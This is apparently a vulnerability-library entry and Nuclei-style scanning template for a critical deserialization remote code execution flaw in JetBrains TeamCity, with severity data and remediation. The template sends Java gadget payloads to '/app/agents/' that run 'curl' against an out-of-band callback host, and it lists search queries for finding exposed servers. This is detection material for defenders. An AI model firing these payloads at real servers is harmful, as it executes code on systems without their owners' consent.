/Vulnerability Library

JetBrains TeamCity < 2026.1.3, 2025.11.7 - Remote Code Execution

CVE-2026-63077
Verified

Description

JetBrains TeamCity < 2026.1.3, 2025.11.7 contains a remote code execution caused by unauthenticated access via the agent polling protocol, letting unauthenticated attackers execute arbitrary code remotely, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

87%

Affected Product

teamcity

Published Date

August 7, 2026

Template Author

0x_akoko, pdteam

CVE-2026-63077.yaml
id: CVE-2026-63077

info:
  name: JetBrains TeamCity < 2026.1.3, 2025.11.7 - Remote Code Execution
  author: 0x_Akoko,pdteam
  severity: critical
  description: |
    JetBrains TeamCity < 2026.1.3, 2025.11.7 contains a remote code execution caused by unauthenticated access via the agent polling protocol, letting unauthenticated attackers execute arbitrary code remotely, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Upgrade to version 2026.1.3, 2025.11.7 or later.
  reference:
    - https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/
    - https://www.rapid7.com/blog/post/etr-cve-2026-63077-critical-unauthenticated-remote-code-execution-in-jetbrains-teamcity/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-63077
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-63077
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-63077
    cwe-id: CWE-502
    epss-score: 0.86518
    epss-percentile: 0.99726
    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: jetbrains
    product: teamcity
    shodan-query: title:"TeamCity"
    fofa-query: title="TeamCity"
  tags: cve,cve2026,jetbrains,teamcity,rce,deserialization,kev,oast,intrusive,vkev

flow: http(1) && (http(2) || http(3) || http(4))

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "TeamCity", "teamcity", "JetBrains")'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/agents/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        User-Agent: TeamCity Agent/2026.1

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and

  - raw:
      - |
        POST /app/agents/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        User-Agent: TeamCity Agent/2026.1

        {{generate_java_gadget("commons-collections3.1", "curl http://{{interactsh-url}}/cc31-rce", "raw")}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and

  - raw:
      - |
        POST /app/agents/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        User-Agent: TeamCity Agent/2026.1

        {{generate_java_gadget("groovy1", "curl http://{{interactsh-url}}/groovy-rce", "raw")}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and
# digest: 490a0046304402207070f1f230b822b1a5c1bfa19481dd4d5217f86924fe95aa07e3f70a0220107e022037a6d00e3a43c87979353008642f93995a93add93645d73019ec17954c66abd1:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-63077
CWE ID:
cwe-502

References

https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/https://www.rapid7.com/blog/post/etr-cve-2026-63077-critical-unauthenticated-remote-code-execution-in-jetbrains-teamcity/https://nvd.nist.gov/vuln/detail/CVE-2026-63077https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-63077

Remediation Steps

Upgrade to version 2026.1.3, 2025.11.7 or later.